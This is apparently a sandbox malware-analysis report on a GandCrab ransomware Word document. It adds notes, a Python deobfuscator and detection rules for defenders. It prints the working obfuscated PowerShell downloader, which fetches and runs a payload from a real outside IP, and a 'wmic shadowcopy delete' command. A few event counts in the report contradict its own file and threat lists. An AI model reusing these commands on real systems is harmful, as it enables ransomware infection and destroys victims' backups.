File name: Emergеnсyexitmар.doc
(The name mixes Latin and Cyrillic letters: the "е", "с", "а" and "р" are Cyrillic look-alikes, consistent with the Windows-1251 code page in the file metadata, so a filename rule that assumes pure ASCII will not match it.)
Full analysis: https://app.any.run/tasks/9dadd907-118c-4dea-ad5c-b3ded1ba2281
Verdict: Malicious activity
Threats:

GandCrab is one of the most widely distributed ransomware families. Ransomware is malware that encrypts the victim's files and demands payment to restore access; without a backup or the attacker's key the files are usually unrecoverable. In this task the chain is: the document's auto-open macro starts cmd.exe, which launches an obfuscated PowerShell downloader; PowerShell fetches youwin.exe from 209.141.56.224, saves it as C:\windows\temp\putty.exe and starts it; that payload writes the YHZSNONEU-DECRYPT.txt ransom note into directories across the system drive, deletes volume shadow copies through wmic.exe, and contacts www.kakaocorp.link.

Analysis date: January 31, 2019, 11:39:23
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
loader
ransomware
gandcrab
trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: admin, Template: Normal.dotm, Last Saved By: Admin, Revision Number: 4, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Mon Jan 28 15:47:00 2019, Last Saved Time/Date: Mon Jan 28 15:48:00 2019, Number of Pages: 1, Number of Words: 11, Number of Characters: 66, Security: 0
MD5: 52DCBD94C557AE6431BB22C133C7AB40
SHA1: EC1B71981FAE120E5D531288880FACF8D40B092D
SHA256: A02894F2828618E5683D32C94350079CAC6DEABE3112F1A38F013086381E4395
SSDEEP: 384:gjzCFiSAoKXMVkGPEmRbpMJ8tcEEdi6O091cdjh8xrSFSX8Se0jrai1:arMVkDMbpgdi6l1jxrSFSX6oN

ANY.RUN is an interactive service that gives the analyst full access to the guest system. The information in this report may therefore have been influenced by analyst actions and is provided as is. ANY.RUN does not guarantee the maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • putty.exe (PID: 3020)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3008)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2292)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3008)
    • Downloads executable files from IP

      • powershell.exe (PID: 2292)
    • GandCrab keys found

      • putty.exe (PID: 3020)
    • Actions look like stealing of personal data

      • putty.exe (PID: 3020)
    • Writes file to Word startup folder

      • putty.exe (PID: 3020)
    • Changes settings of System certificates

      • putty.exe (PID: 3020)
    • Renames files like Ransomware

      • putty.exe (PID: 3020)
    • Deletes shadow copies

      • putty.exe (PID: 3020)
    • Dropped file may contain instructions of ransomware

      • putty.exe (PID: 3020)
    • Connects to CnC server

      • putty.exe (PID: 3020)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2292)
    • Creates files in the user directory

      • powershell.exe (PID: 2292)
      • putty.exe (PID: 3020)
    • Executes PowerShell scripts

      • cmd.exe (PID: 3652)
    • Creates files in the Windows directory

      • powershell.exe (PID: 2292)
    • Reads the cookies of Mozilla Firefox

      • putty.exe (PID: 3020)
    • Creates files in the program directory

      • putty.exe (PID: 3020)
    • Creates files like Ransomware instruction

      • putty.exe (PID: 3020)
    • Adds / modifies Windows certificates

      • putty.exe (PID: 3020)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3008)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3008)
    • Dropped object may contain TOR URLs

      • putty.exe (PID: 3020)
Find more information about signature artifacts and their mapping to the MITRE ATT&CK™ matrix in the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: ???????? Microsoft Word 97-2003
CompObjUserTypeLen: 32
HeadingPairs:
  • Title (Название)
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 76
Paragraphs: 1
Lines: 1
Company: Salve
CodePage: Windows Cyrillic
Security: None
Characters: 66
Words: 11
Pages: 1
ModifyDate: 2019:01:28 15:48:00
CreateDate: 2019:01:28 15:47:00
TotalEditTime: 1.0 minutes
Software: Microsoft Office Word
RevisionNumber: 4
LastModifiedBy: Admin
Template: Normal.dotm
Keywords: -
Author: admin
Subject: -
Title: -
No data.
All screenshots are available in the full report
Total processes: 43
Monitored processes: 7
Malicious processes: 4
Suspicious processes: 0

Behavior graph

Process tree, reconstructed from the parent-process column of the process information below (PIDs as recorded by the sandbox):

explorer.exe
  └─ WINWORD.EXE (PID 3008)
       └─ cmd.exe (PID 3652)
            └─ powershell.exe (PID 2292)   downloads youwin.exe, writes and starts C:\windows\temp\putty.exe
                 └─ putty.exe (PID 3020)   #GANDCRAB
                      └─ wmic.exe (PID 2408)   shadowcopy delete
services.exe
  └─ vssvc.exe (PID 3536)   Volume Shadow Copy Service
explorer.exe
  └─ NOTEPAD.EXE (PID 1300)   opens the YHZSNONEU-DECRYPT.txt ransom note

Process information

PID 3008  WINWORD.EXE  (parent: explorer.exe)
  Command line: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Emergеnсyexitmар.doc"
  Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
  User: admin   Company: Microsoft Corporation   Integrity level: MEDIUM
  Description: Microsoft Word   Version: 14.0.6024.1000

PID 3652  cmd.exe  (parent: WINWORD.EXE)
  Command line (as recorded, including the doubled backslashes in the cmd path):
  c:\\windows\\system32\\cmd /c powershell $Rq6Er7D = '57087.66373351$D54cvV70T = 57087.66373351n57087.66373351e57087.66373351w57087.66373351-obj57087.66373351e57087.66373351c57087.66373351t n57087.66373351e57087.66373351t57087.66373351.w57087.66373351e57087.66373351b57087.66373351cli57087.66373351ent; $D54cvV70T.d57087.66373351o57087.66373351w57087.66373351n57087.66373351l57087.66373351o57087.66373351a57087.66373351d57087.66373351f57087.66373351i57087.66373351le(\"57087.66373351h57087.66373351t57087.66373351t57087.66373351p57087.66373351://209.141.56.224/youwin.exe\", \"c:\win57087.66373351dows\t57087.66373351emp\put57087.66373351t57087.66373351y57087.66373351.57087.66373351e57087.66373351x57087.66373351e\"); 57087.66373351s57087.66373351tar57087.66373351t-p57087.66373351r57087.66373351o57087.66373351ces57087.66373351s \"c:\win57087.66373351d57087.66373351o57087.66373351ws\temp\p57087.66373351u57087.66373351t57087.66373351t57087.66373351y.ex57087.66373351e\";'.replace('57087.66373351', $A3XhdAMlf);$iAxsKO45P = '';iex($Rq6Er7D);
  Path: c:\windows\system32\cmd.exe
  User: admin   Company: Microsoft Corporation   Integrity level: MEDIUM
  Description: Windows Command Processor   Exit code: 0   Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID 2292  powershell.exe  (parent: cmd.exe)
  Command line: powershell followed by the same script body as PID 3652 above (the cmd /c wrapper is the only difference)
  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  User: admin   Company: Microsoft Corporation   Integrity level: MEDIUM
  Description: Windows PowerShell   Exit code: 0   Version: 6.1.7600.16385 (win7_rtm.090713-1255)

  The script is a string-rebuild obfuscation: the junk token 57087.66373351 is spliced between the letters of the real command and stripped again with .replace('57087.66373351', $A3XhdAMlf) before iex runs the result. $A3XhdAMlf is never assigned in the command line, so PowerShell expands it to $null and String.Replace removes every occurrence of the token. What remains is a plain WebClient download of http://209.141.56.224/youwin.exe to c:\windows\temp\putty.exe followed by start-process on that file, which matches the HTTP request and the putty.exe process recorded below.
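The decoding described above, as an added example in Python that is not part of the ANY.RUN report: it applies the two rules the obfuscation relies on (powershell.exe receives its command text through C-runtime argv parsing, so `\"` becomes `"`; and .NET `String.Replace(old, null)` removes every occurrence of `old`), strips the junk token and pulls the URL and drop path out of the result. `RECORDED` is the PID 2292 command line copied from this page; the function names are this example's own.

```python
import re

# Command line recorded for PID 2292 in this report, copied verbatim (the
# cmd.exe wrapper, PID 3652, carries the same script body after "cmd /c").
RECORDED = (
    r"powershell $Rq6Er7D = '57087.66373351$D54cvV70T = 57087.66373351n57087.66373351e"
    r"57087.66373351w57087.66373351-obj57087.66373351e57087.66373351c57087.66373351t "
    r"n57087.66373351e57087.66373351t57087.66373351.w57087.66373351e57087.66373351b"
    r"57087.66373351cli57087.66373351ent; $D54cvV70T.d57087.66373351o57087.66373351w"
    r"57087.66373351n57087.66373351l57087.66373351o57087.66373351a57087.66373351d"
    r"57087.66373351f57087.66373351i57087.66373351le(\"57087.66373351h57087.66373351t"
    r"57087.66373351t57087.66373351p57087.66373351://209.141.56.224/youwin.exe\", "
    r"\"c:\win57087.66373351dows\t57087.66373351emp\put57087.66373351t57087.66373351y"
    r"57087.66373351.57087.66373351e57087.66373351x57087.66373351e\"); "
    r"57087.66373351s57087.66373351tar57087.66373351t-p57087.66373351r57087.66373351o"
    r"57087.66373351ces57087.66373351s \"c:\win57087.66373351d57087.66373351o"
    r"57087.66373351ws\temp\p57087.66373351u57087.66373351t57087.66373351t"
    r"57087.66373351y.ex57087.66373351e\";'.replace('57087.66373351', $A3XhdAMlf);"
    r"$iAxsKO45P = '';iex($Rq6Er7D);"
)

# Matches  '<body>'.replace('<junk>', $var)  as used by this downloader.
REPLACE_CALL = re.compile(r"'([^']*)'\.replace\('([^']+)',\s*(\$\w+)\)", re.I)


def unescape_argv(cmdline: str) -> str:
    """powershell.exe gets its command text through C-runtime argv rules,
    where a backslash-escaped quote (\\") arrives as a plain quote."""
    return cmdline.replace('\\"', '"')


def resolve_variable(script: str, name: str) -> str:
    """Value of $name if the script assigns it a single-quoted literal.
    An unassigned variable expands to $null, and String.Replace(old, null)
    removes every occurrence of old, so the empty string is the right stand-in."""
    m = re.search(re.escape(name) + r"\s*=\s*'([^']*)'", script)
    return m.group(1) if m else ""


def deobfuscate(cmdline: str):
    """Return the script that iex would run, or None if the pattern is absent."""
    script = unescape_argv(cmdline)
    m = REPLACE_CALL.search(script)
    if not m:
        return None
    body, junk, var = m.groups()
    return body.replace(junk, resolve_variable(script, var))


def extract_iocs(decoded: str) -> dict:
    """Pull URLs and local paths out of the decoded script and flag the
    download-cradle / execution idioms a SOC would alert on."""
    urls = re.findall(r"https?://[^\s\"'()]+", decoded, re.I)
    paths = re.findall(r"[a-z]:\\[^\s\"'()]+", decoded, re.I)
    low = decoded.lower()
    return {
        "urls": sorted(set(urls)),
        "paths": sorted({p.lower() for p in paths}),
        "download_cradle": "webclient" in low and "downloadfile(" in low,
        "executes_payload": "start-process" in low,
    }


if __name__ == "__main__":
    decoded = deobfuscate(RECORDED)
    print(decoded)
    print(extract_iocs(decoded))
```

Running it prints the one-line downloader (`new-object net.webclient`, `downloadfile(...)`, `start-process ...`) and the two indicators, the URL on 209.141.56.224 and the c:\windows\temp\putty.exe drop path, which is exactly what the HTTP request and process records in this report show. One caveat when reproducing this in a live PowerShell: the trick depends on $A3XhdAMlf being unassigned, so under Set-StrictMode the same command line would throw instead of running.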
PID 3020  putty.exe  (parent: powershell.exe)
  Command line: "C:\windows\temp\putty.exe"
  Path: C:\windows\temp\putty.exe
  User: admin   Company: United Technologies   Integrity level: MEDIUM
  Description: Winword Twainambient Hagd 'computer Diagnose   Version: (none recorded)
  Note: despite the file name this is the youwin.exe fetched by PID 2292 and written to disk under a new name; the company and description strings are bogus version-info, not PuTTY's. This is the GandCrab payload.

PID 2408  wmic.exe  (parent: putty.exe)
  Command line: "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
  Path: C:\Windows\system32\wbem\wmic.exe
  User: SYSTEM   Company: Microsoft Corporation   Integrity level: SYSTEM
  Description: WMI Commandline Utility   Exit code: 0   Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID 3536  vssvc.exe  (parent: services.exe)
  Command line: C:\Windows\system32\vssvc.exe
  Path: C:\Windows\system32\vssvc.exe
  User: SYSTEM   Company: Microsoft Corporation   Integrity level: SYSTEM
  Description: Microsoft® Volume Shadow Copy Service   Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID 1300  NOTEPAD.EXE  (parent: explorer.exe)
  Command line: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\YHZSNONEU-DECRYPT.txt
  Path: C:\Windows\system32\NOTEPAD.EXE
  User: admin   Company: Microsoft Corporation   Integrity level: MEDIUM
  Description: Notepad   Version: 6.1.7600.16385 (win7_rtm.090713-1255)
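The process chain above (Word to cmd.exe to an obfuscated PowerShell, a binary started from \windows\temp, then wmic deleting shadow copies) is what endpoint telemetry would show long before a ransom note appears. As an added example that is not part of the ANY.RUN report, the Python below runs four such rules over process-creation records and reconstructs the parent chain for any PID. The `EVENTS` list is constructed from this report's process information (PIDs, images, parents and command lines follow the page; the PowerShell command line is abridged); the record layout is a simplified Sysmon-style tuple, not ANY.RUN's format, and the PIDs 1234 for explorer.exe and 4321 for services.exe are invented because the report does not give them.

```python
import re

# Abridged from the PID 2292 command line in this report: enough of the
# string-rebuild pattern (junk token, .replace(), iex) for the rule to fire.
OBF = ("powershell $Rq6Er7D = '57087.66373351n57087.66373351e57087.66373351w-object net.webclient'"
       ".replace('57087.66373351', $A3XhdAMlf);iex($Rq6Er7D);")

# Constructed process-creation records: (pid, ppid, image, parent image, command line).
# PIDs 1234 (explorer.exe) and 4321 (services.exe) are invented; the rest follow the report.
EVENTS = [
    (3008, 1234, r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE", r"C:\Windows\explorer.exe",
     r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Emergеnсyexitmар.doc"'),
    (3652, 3008, r"c:\windows\system32\cmd.exe", r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     r"c:\\windows\\system32\\cmd /c " + OBF),
    (2292, 3652, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"c:\windows\system32\cmd.exe",
     OBF),
    (3020, 2292, r"C:\windows\temp\putty.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'"C:\windows\temp\putty.exe"'),
    (2408, 3020, r"C:\Windows\system32\wbem\wmic.exe", r"C:\windows\temp\putty.exe",
     r'"C:\Windows\system32\wbem\wmic.exe" shadowcopy delete'),
    (3536, 4321, r"C:\Windows\system32\vssvc.exe", r"C:\Windows\system32\services.exe",
     r"C:\Windows\system32\vssvc.exe"),
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check(pid, ppid, image, parent, cmd):
    """Apply the rules to one record; returns the names of the rules that fired."""
    img, par, low = basename(image), basename(parent), cmd.lower()
    hits = []
    if par in OFFICE and img in SHELLS:
        hits.append("office-spawns-shell")            # macro handing off to a shell
    if img == "powershell.exe" and ".replace(" in low and re.search(r"\biex\b|invoke-expression", low):
        hits.append("powershell-replace-then-iex")    # string-rebuild obfuscation
    if "\\temp\\" in image.lower() and par in SHELLS:
        hits.append("shell-runs-exe-from-temp")       # dropped second stage
    if (img == "wmic.exe" and "shadowcopy" in low and "delete" in low) or \
       (img == "vssadmin.exe" and "delete" in low and "shadows" in low):
        hits.append("shadow-copy-deletion")           # ransomware inhibiting recovery
    return hits


def scan(events):
    """Map pid -> fired rule names for every record that triggered at least one rule."""
    result = {}
    for ev in events:
        hits = check(*ev)
        if hits:
            result[ev[0]] = hits
    return result


def lineage(events, pid):
    """Image names from pid up to the first ancestor that has no record of its own."""
    by_pid = {e[0]: e for e in events}
    chain = []
    while pid in by_pid:
        _, ppid, image, parent, _ = by_pid[pid]
        chain.append(basename(image))
        if ppid not in by_pid:
            chain.append(basename(parent))
        pid = ppid
    return chain


if __name__ == "__main__":
    for pid, rules in scan(EVENTS).items():
        print(pid, rules, "<-", " <- ".join(lineage(EVENTS, pid)))
```

Each of the four flagged PIDs (3652, 2292, 3020, 2408) shares the same lineage back to WINWORD.EXE, which is the point of keeping the parent chain: a single rule such as "wmic shadowcopy delete" is noisy on its own, but the same event with Word as the great-grandparent is not. The abridged command line is only for the rule test; the full obfuscated script is in the process information above.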
Total events: 1 398
Read events: 891
Write events: 0
Delete events: 0

Modification events

No data
Executable files: 1
Suspicious files: 430
Text files: 323
Unknown types: 18

Dropped files

PID   Process         Filename                                                                                              Type
3008  WINWORD.EXE     C:\Users\admin\AppData\Local\Temp\CVR6A44.tmp.cvr                                                     (not recorded)
      MD5: (not recorded)   SHA256: (not recorded)
2292  powershell.exe  C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1YU6524W7OUTYV58U7UP.temp  (not recorded)
      MD5: (not recorded)   SHA256: (not recorded)
3020  putty.exe       C:\PerfLogs\Admin\YHZSNONEU-DECRYPT.txt                                                               text
      MD5: 045034DDC83E7C7932412A6371C056DC   SHA256: 966363663B77603773738D8D41C3D30EB9BC610D972A846E65E7D5C53DC65DA4
2292  powershell.exe  C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms  binary
      MD5: 6073B6FC66D2E68644893344F6904E4A   SHA256: 0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
3020  putty.exe       C:\$Recycle.Bin\S-1-5-21-1302019708-1500728564-335382590-1000\YHZSNONEU-DECRYPT.txt                   text
      MD5: 045034DDC83E7C7932412A6371C056DC   SHA256: 966363663B77603773738D8D41C3D30EB9BC610D972A846E65E7D5C53DC65DA4
3020  putty.exe       C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\YHZSNONEU-DECRYPT.txt                                text
      MD5: 045034DDC83E7C7932412A6371C056DC   SHA256: 966363663B77603773738D8D41C3D30EB9BC610D972A846E65E7D5C53DC65DA4
3020  putty.exe       C:\YHZSNONEU-DECRYPT.txt                                                                              text
      MD5: 045034DDC83E7C7932412A6371C056DC   SHA256: 966363663B77603773738D8D41C3D30EB9BC610D972A846E65E7D5C53DC65DA4
3020  putty.exe       C:\Program Files\YHZSNONEU-DECRYPT.txt                                                                text
      MD5: 045034DDC83E7C7932412A6371C056DC   SHA256: 966363663B77603773738D8D41C3D30EB9BC610D972A846E65E7D5C53DC65DA4
3008  WINWORD.EXE     C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat                                      text
      MD5: 1C9737B6B22A0A0C51A81C8161DFCE04   SHA256: 5E1655BDA0BCCEA8122FA9956330777CD4B444C5B11BF13C53F2949E40FD92DC
3020  putty.exe       C:\Config.Msi\YHZSNONEU-DECRYPT.txt                                                                   text
      MD5: 045034DDC83E7C7932412A6371C056DC   SHA256: 966363663B77603773738D8D41C3D30EB9BC610D972A846E65E7D5C53DC65DA4

Every YHZSNONEU-DECRYPT.txt copy has the same hashes: the payload writes one identical ransom note into each directory it touches, so the note's hash is a usable file indicator alongside the name pattern.
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 2
TCP/UDP connections: 3
DNS requests: 1
Threats: 0

HTTP requests

PID   Process         Method  HTTP code  IP                 URL                               CN  Type        Size    Reputation
2292  powershell.exe  GET     200        209.141.56.224:80  http://209.141.56.224/youwin.exe  US  executable  421 Kb  suspicious
3020  putty.exe       GET     301        46.30.41.117:80    http://www.kakaocorp.link/        RU  html        162 b   malicious

The 301 answered on port 80 is consistent with the follow-up TLS connection to the same host on port 443 listed under Connections.

Connections

PID   Process         IP                 Domain              ASN                 CN  Reputation
2292  powershell.exe  209.141.56.224:80  -                   FranTech Solutions  US  suspicious
3020  putty.exe       46.30.41.117:443   www.kakaocorp.link  Webzilla B.V.       RU  suspicious
3020  putty.exe       46.30.41.117:80    www.kakaocorp.link  Webzilla B.V.       RU  suspicious

DNS requests

Domain              IP            Reputation
www.kakaocorp.link  46.30.41.117  malicious

Threats

PID   Process         Class                                  Message
2292  powershell.exe  A Network Trojan was detected          ET INFO Executable Download from dotted-quad Host
2292  powershell.exe  Potential Corporate Privacy Violation  ET POLICY PE EXE or DLL Windows file download HTTP
2292  powershell.exe  Potentially Bad Traffic                ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2292  powershell.exe  Potentially Bad Traffic                ET INFO SUSPICIOUS Dotted Quad Host MZ Response
2 ETPRO signatures available at the full report
No debug info